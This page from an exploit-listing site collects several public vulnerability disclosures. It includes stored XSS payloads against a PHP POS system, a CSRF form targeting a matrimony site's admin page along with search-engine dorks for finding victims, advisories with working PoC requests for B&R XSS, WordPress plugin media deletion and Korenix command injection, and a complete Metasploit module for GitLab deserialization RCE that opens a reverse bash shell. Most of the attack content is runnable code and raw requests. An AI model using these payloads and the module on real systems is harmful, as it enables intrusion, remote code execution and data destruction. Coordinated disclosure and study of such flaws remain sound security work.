Latest exploits :: CodePwn

<pre><code># Exploit Title: Stored Cross Site Scripting on Best pos Management System # Google Dork: NA # Date: 14/2/2023 # Exploit Author: Ahmed Ismail (@MrOz1l) # Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip # Version: 1.0 # Tested on: Windows 11 # CVE : NA # Description Payload : "><img src=x onerror=prompt(document.domain);> # POC : 1- Head to Add Category on "http://localhost/kruxton/index.php?page=add-category" 2- On Name Parameter add our Payload "><img src=x onerror=prompt(document.domain);> 3- After Adding This Category XSS will run ``` POST /kruxton/ajax.php?action=save_category HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------7128987773293048653857517 Content-Length: 442 Origin: http://localhost Connection: close Referer: http://localhost/kruxton/index.php?page=add-category Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------7128987773293048653857517 Content-Disposition: form-data; name="id" -----------------------------7128987773293048653857517 Content-Disposition: form-data; name="name" XSSPOC"><img src=x onerror=prompt(document.domain);> -----------------------------7128987773293048653857517 Content-Disposition: form-data; name="description" This is POC -----------------------------7128987773293048653857517-- ``` -------------------------------------- # Exploit Title: Stored Cross Site Scripting on Best pos Management System # Google Dork: NA # Date: 17/2/2023 # Exploit Author: Ahmed Ismail (@MrOz1l) # Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip # Version: 1.0 # Tested on: Windows 11 # CVE : NA Payload : "><img src=x onerror=prompt(document.domain);> # POC : 1- Head to Add Category on "http://localhost/kruxton/ajax.php?action=save_product" 2- On Name Parameter add our Payload "><img src=x onerror=prompt(document.domain);> on description <img src=x onerror=prompt(2);> 3- After Adding This Category XSS will run ``` POST /kruxton/ajax.php?action=save_product HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------11015616619250686693182759357 Content-Length: 830 Origin: http://localhost Connection: close Referer: http://localhost/kruxton/index.php?page=add-product Cookie: PHPSESSID=<COOKIE> Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------11015616619250686693182759357 Content-Disposition: form-data; name="id" -----------------------------11015616619250686693182759357 Content-Disposition: form-data; name="category_id" 3' -----------------------------11015616619250686693182759357 Content-Disposition: form-data; name="name" XSSPOC2"><img src=x onerror=prompt(document.domain);> -----------------------------11015616619250686693182759357 Content-Disposition: form-data; name="description" XSSPOC2"><img src=x onerror=prompt(2);> -----------------------------11015616619250686693182759357 Content-Disposition: form-data; name="price" 1122 -----------------------------11015616619250686693182759357 Content-Disposition: form-data; name="status" 1 -----------------------------11015616619250686693182759357-- ``` </code></pre>

<pre><code>==================================================================================================================================== | # Title : Demanzo Matrimony v.1.5 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit) | | # Vendor : https://demanzo.com/matrimony-site-development/ | | # Dork : Powered by ITAcumens or "Powered by Demanzo" | ==================================================================================================================================== poc : [+] infected file: add-staff.php [+] Inside folder /admin/add-staff.php [+] Dorking İn Google Or Other Search Enggine. [+] Copy the code below and paste it into an HTML file. [+] Go to the line 2. [+] Set the target site link Save changes and apply . </div> <form action="https://www.example/web/html/admin/add-staff.php" method="POST"> <div id="msg"> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Name * : </label> <div class="col-md-8 frm_pd"> <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name"> </div> </div> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Password * : </label> <div class="col-md-8 frm_pd"> <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password"> </div> </div> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Email ID * : </label> <div class="col-md-8 frm_pd"> <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID"> </div> </div> <div class="form-group ban_btm1 col-md-6 no_pad"> <label class="control-label col-md-4 frm_pd">Gender * : </label> <div class="col-md-8 frm_pd"> <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label> <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label> </div> </div> <div class="form-group ban_btm1 col-md-12 no_pad"> <label class="control-label frm_pd col-md-2">Designation * : </label> <div class="col-md-10 frm_pd"> <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation"> </div> </div> <div class="form-group ban_btm1 col-md-12 no_pad"> <label class="control-label col-md-2 frm_pd">Address * : </label> <div class="col-md-10 frm_pd"> <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea> </div> </div>                                  <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad"> <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status * : </label> <div class="col-lg-8 col-md-10 frm_pd"> <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label> <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label> </div> </div> <div class="col-md-2 col-md-offset-5 col-sm-12"> <input type="submit" class="ctn_btn no_mt1" value="Add" name="add"> </div> Greetings to :=================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| ================================================================================================== </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230214-0 > ======================================================================= title: Multiple XSS Vulnerabilities product: B&R Systems Diagnostics Manager vulnerable version: >=3.00 and <=C4.93 fixed version: >=D4.93 CVE number: CVE-2022-4286 impact: medium homepage: https://www.br-automation.com found: 2022-10-28 by: S. Robertz (Office Vienna) G. Hechenberger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Our slogan is our mission. The pursuit of Perfection in Automation has inspired and guided B&R for over 40 years. To us, perfection means more than developing the best solutions in industrial automation. It also means developing the best relationships – with our customers and partners as well as our employees and suppliers. Keen foresight and entrepreneurial courage helped us rise quickly into the ranks of top global players in industrial automation. An intuitive sense of market dynamics and emerging trends has established us as a pioneer, leading the way with the most innovative technology on the market. Our role as the ABB Group's global center for machine and factory automation strengthens our position of leadership and adds new momentum to our impressive record of sustained growth." Source: https://www.br-automation.com/en/about-us/ Business recommendation: ------------------------ The vendor provides a software update which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286) An attacker can execute arbitrary JavaScript code in the context of the victim's session, thus perform all actions, exfiltrate information, etc. In order to exploit this vulnerability the attacker will have to trick the user into visiting a manipulated URL. Proof of concept: ----------------- 1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286) The following URL has to be visited by the victim in order to execute arbitrary JavaScript code. http://<PLC-IP>/sdm/cgiFileLoop.cgi?service=javascript:alert(document.domain);%2f%2f&type=512&scope=%3Cfile:///etc/passwd%3E&module=Snapshot&option=3 A very similar vulnerability can be found at another endpoint of the System Diagnostic Manager (SDM). http://<PLC-IP>/sdm/svg.cgi?type=cpuusage&index=1%3Cscript%3Ealert(document.domain)%3C/script%3E Vulnerable / tested versions: ----------------------------- The following device and firmware version has been tested: * B&R X20CP3687X SwModuleVersion 186 According to the vendor, all B&R Automation Runtime (AR) versions >=3.00 and <=C4.93 are affected. Vendor contact timeline: ------------------------ 2022-11-21: Contacting vendor through cybersecurity@br-automation.com. Sent encrypted advisory. 2022-11-22: Vendor requests B&R Automation Runtime version. 2022-12-01: Vendor confirms vulnerability. Will be fixed with next release. Asking for timeline. 2022-12-13: Advisory and patch will be published on 2023-02-10. Vendor offers to share the advisory for review purposes. 2023-01-25: Reviewing vendor advisory, receiving CVE + affected/fixed version numbers 2023-02-10: Vendor provides the patch. 2023-02-14: Coordinated release of security advisory. Solution: --------- The vendor supplies a patch, which should be installed immediately. The following version mitigates the identified XSS issues: * B&R Automation Runtime version >=D4.93 The vendor has published the following security advisory: https://www.br-automation.com/downloads_br_productcatalogue/assets/1675607299099-en-original-1.0.pdf Workaround: ----------- Administrators can deactivate the System Diagnostics Manager in case it is not needed. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz, G. Hechenberger / @2023 </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Quiz And Survey Master Vendor URL: https://wordpress.org/plugins/quiz-master-next/ Type: Cross-Site Request Forgery (CSRF) [CWE-352] Date found: 2023-01-13 Date published: 2023-02-08 CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) CVE: CVE-2023-0292 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Quiz And Survey Master 8.0.8 and below 4. INTRODUCTION =============== Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used to create engaging content to drive traffic and increase user engagement. Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee surveys. This plugin is the ultimate marketing tool for your website. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The plugin offers the ajax action "qsm_remove_file_fd_question" which is used to delete uploaded media contents from the WordPress instance. However, the functionality is not protected by an anti-CSRF token/nonce. Since there is no anti-CSRF token protecting this functionality, it is vulnerable to Cross-Site Request Forgery attacks allowing an attacker to delete uploaded media contents on behalf of the attacked user. To successfully exploit this vulnerability, a user with the right to access the plugin must be tricked into visiting an arbitrary website while having an authenticated session in the application. 6. PROOF OF CONCEPT =================== The following Proof-of-Concept would delete the uploaded media with the ID "1": <html>  <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="qsm_remove_file_fd_question" /> <input type="hidden" name="media_id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> 7. SOLUTION =========== Update to version 8.0.9 8. REPORT TIMELINE ================== 2023-01-13: Discovery of the vulnerability 2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291 2023-01-18: Sent initial notification to vendor via contact form 2022-01-18: Vendor response 2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability 2022-02-08: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Quiz And Survey Master Vendor URL: https://wordpress.org/plugins/quiz-master-next/ Type: Missing Authentication for Critical Function [CWE-306] Date found: 2023-01-13 Date published: 2023-02-08 CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) CVE: CVE-2023-0291 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Quiz And Survey Master 8.0.8 and below 4. INTRODUCTION =============== Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used to create engaging content to drive traffic and increase user engagement. Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee surveys. This plugin is the ultimate marketing tool for your website. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated users which accepts a "media_id" parameter pointing to a any item uploaded through WordPress' media upload functionality. However, this "media_id" is afterward used in a forced wp_delete_attachment() call ultimately deleteing the media from the WordPress instance. Successful exploits can allow an unauthenticated attacker to delete any (and all) uploaded WordPress media files. 6. PROOF OF CONCEPT =================== The following Proof-of-Concept would delete the uploaded media with the ID "1": POST /wp-admin/admin-ajax.php HTTP/2 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 44 action=qsm_remove_file_fd_question&media_id=1 7. SOLUTION =========== Update to version 8.0.9 8. REPORT TIMELINE ================== 2023-01-13: Discovery of the vulnerability 2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291 2023-01-18: Sent initial notification to vendor via contact form 2022-01-18: Vendor response 2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability 2022-02-08: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories -- Mit freundlichen Grüßen / With best regards / Atentamente Julien Ahrens Freelancer | Penetration Tester RCE Security VAT-ID: DE328576638 Website: www.rcesecurity.com This e-mail may contain confidential and/or privileged information. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Git::SmartHttp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Gitlab include Msf::Exploit::RubyDeserialization attr_accessor :cookie def initialize(info = {}) super( update_info( info, 'Name' => 'GitLab GitHub Repo Import Deserialization RCE', 'Description' => %q{ An authenticated user can import a repository from GitHub into GitLab. If a user attempts to import a repo from an attacker-controlled server, the server will reply with a Redis serialization protocol object in the nested `default_branch`. GitLab will cache this object and then deserialize it when trying to load a user session, resulting in RCE. }, 'Author' => [ 'William Bowling (vakzz)', # discovery 'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module 'RedWay Security <https://infosec.exchange/@redway>', # PoC ], 'References' => [ ['URL', 'https://hackerone.com/reports/1679624'], ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'], ['CVE', '2022-2992'] ], 'DisclosureDate' => '2022-10-06', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Privileged' => false, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new('USERNAME', [true, 'The username to authenticate as', nil]), OptString.new('PASSWORD', [true, 'The password for the specified username', nil]), OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]), OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL']) ] ) deregister_options('GIT_URI') end def group_name @group_name ||= Rex::Text.rand_text_alpha(8..12) end def api_token @api_token ||= gitlab_create_personal_access_token end def session_id @session_id ||= Rex::Text.rand_text_hex(32) end def redis_payload(cmd) serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter) gitlab_session_id = "session:gitlab:#{session_id}" # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/) # The command set # The gitlab session to load the payload from # The Payload itself. A Ruby serialized command "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}" end def check self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie vprint_status('Trying to get the GitLab version') version = Rex::Version.new(gitlab_version) return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless ( version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) || version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) || version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2')) ) report_vuln( host: rhost, name: name, refs: references, info: [version] ) return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.") rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError return CheckCode::Detected('Could not detect the version because authentication failed.') rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e return CheckCode::Unknown("#{e.class} - #{e.message}") end def cleanup super return unless @import_id gitlab_delete_group(@group_id, api_token) gitlab_revoke_personal_access_token(api_token) gitlab_sign_out rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e print_error("#{e.class} - #{e.message}") end def exploit if Rex::Socket.is_internal?(srvhost_addr) print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.") end setup_repo_structure start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => '/' } }) execute_command(payload.encoded) rescue Timeout::Error => e fail_with(Failure::TimeoutExpired, e.message) end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie vprint_status("Session ID: #{session_id}") vprint_status("Creating group #{group_name}") # We need group id for the cleanup method @group_id = gitlab_create_group(group_name, api_token)['id'] fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id @redis_payload = redis_payload(cmd) # import a repository from GitHub vprint_status('Importing a repository from GitHub') @import_id = gitlab_import_github_repo( group_name: group_name, github_hostname: get_uri, api_token: api_token )['id'] fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id # wait for the import tasks to finish select(nil, nil, nil, datastore['IMPORT_DELAY']) # execute the payload send_request_cgi({ 'uri' => normalize_uri(target_uri.path, group_name), 'method' => 'GET', 'keep_cookies' => false, 'cookie' => "_gitlab_session=#{session_id}" }) rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e fail_with(Failure::Unknown, "#{e.class} - #{e.message}") end def setup_repo_structure blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt" blob_data = Rex::Text.rand_text_alpha(5..12) blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data) tree_data = { mode: '100644', file_name: blob_object_fname, sha1: blob_object.sha1 } tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data) commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1) git_objs = [ commit_obj, tree_object, blob_object ] @refs = { 'HEAD' => 'refs/heads/main', 'refs/heads/main' => commit_obj.sha1 } @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs) end # Handle incoming requests from GitLab server def on_request_uri(cli, req) super headers = { 'Content-Type' => 'application/json' } data = {}.to_json case req.uri when %r{/api/v3/rate_limit} headers.merge!({ 'X-RateLimit-Limit' => '100000', 'X-RateLimit-Remaining' => '100000' }) when %r{/api/v3/repositories/(\w{1,20})} id = Regexp.last_match(1) name = Rex::Text.rand_text_alpha(8..12) data = { id: id, name: name, full_name: "#{name}/name", clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git" }.to_json when %r{/\w+/public.git/info/refs} data = build_pkt_line_advertise(@refs) headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' }) when %r{/\w+/public.git/git-upload-pack} data = build_pkt_line_sideband(@packfile) headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' }) when %r{/api/v3/repos/\w+/\w+} bytes_size = rand(3..8) data = { 'default_branch' => { 'to_s' => { 'bytesize' => bytes_size, 'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}" # using a simple string format for RESP } } }.to_json end send_response(cli, data, headers) end end </code></pre>

<pre><code>CyberDanube Security Research 20230213-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, | JetWave 2414/2114, JetWave 2424, JetWave 2460, | JetWave 3220/3420 V3 vulnerable version| See "Vulnerable Versions" fixed version| See "Solution" CVE number| requested impact| High homepage| https://korenix.com/ found| 2022-11-28 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. [...] Our products are mainly applied in SMART industries: Surveillance, Machine- to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners." Source: https://www.korenix.com/en/about/index.aspx?kind=3 Vulnerable Versions: ------------------------------------------------------------------------------- The following firmware versions have been found to be vulnerable by CyberDanube: * Korenix JetWave4221 HP-E <= V1.3.0 * Korenix JetWave 3220/3420 V3 < V1.7 The following firmware versions have been identified to be vulnerable by the vendor: * Korenix JetWave 2212G V1.3.T * Korenix JetWave 2212X/2112S V1.3.0 * Korenix JetWave 2211C < V1.6 * Korenix JetWave 2411/2111 < V1.5 * Korenix JetWave 2411L/2111L < V1.6 * Korenix JetWave 2414/2114 < V1.4 * Korenix JetWave 2424 < V1.3 * Korenix JetWave 2460 < V1.6 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker. 2) Authenticated Denial of Web-Service When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection 1.a) The command "touch /tmp/poc" was injected to the system by using the following POST request: =============================================================================== POST /goform/formTFTPLoadSave HTTP/1.1 Host: 172.16.0.38 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 127 Origin: http://172.16.0.38 Connection: close Referer: http://172.16.0.38/mgmtsaveconf.asp Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45 Upgrade-Insecure-Requests: 1 submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit =============================================================================== The command gets executed as root and a file under the folder /tmp/ is created. 1.b) The command "touch /tmp/poc2" was injected to the system by using the following POST request: =============================================================================== POST /goform/formSysCmd HTTP/1.1 Host: 172.16.0.38 Content-Type: application/x-www-form-urlencoded Connection: close Referer: 172.16.0.38 Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb Content-Length: 40 sysCmd=touch%20/tmp/poc2&submit-url= =============================================================================== The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd. 2) Authenticated Denial of Web-Service The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault: =============================================================================== POST /goform/formDefault HTTP/1.1 Host: 172.16.0.38 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://172.16.0.38 Connection: close Referer: http://172.16.0.38/toolping.asp Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356 Upgrade-Insecure-Requests: 1 PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping =============================================================================== The output was observed on the terminal using our emulated instance: =============================================================================== rm: invalid option -- / BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary Usage: rm [OPTION]... FILE... Remove (unlink) the FILE(s). You may use '--' to indicate that all following arguments are non-options. Options: -i always prompt before removing each destination -f remove existing destinations, never prompt -r or -R remove the contents of directories recursively killall: wlwatchdog: no process killed killall: wlapwatchdog: no process killed =============================================================================== The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Owner of these products are suggested to update to the following versions: * Korenix JetWave 4221 HP-E V1.4.0 * Korenix JetWave 2212G V1.10 * Korenix JetWave 2212X/2112S V1.11 * Korenix JetWave 2211C V1.6 * Korenix JetWave 2411/2111 V1.5 * Korenix JetWave 2411L/2111L V1.6 * Korenix JetWave 2414/2114 V1.4 * Korenix JetWave 2424 V1.3 * Korenix JetWave 2460 V1.6 * Korenix JetWave 3220/3420 V3 V1.7 Recommendation ------------------------------------------------------------------------------- CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended. Contact Timeline ------------------------------------------------------------------------------- 2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com 2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months. 2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other products have been patched. 2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching. 2023-02-13: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2023 </code></pre>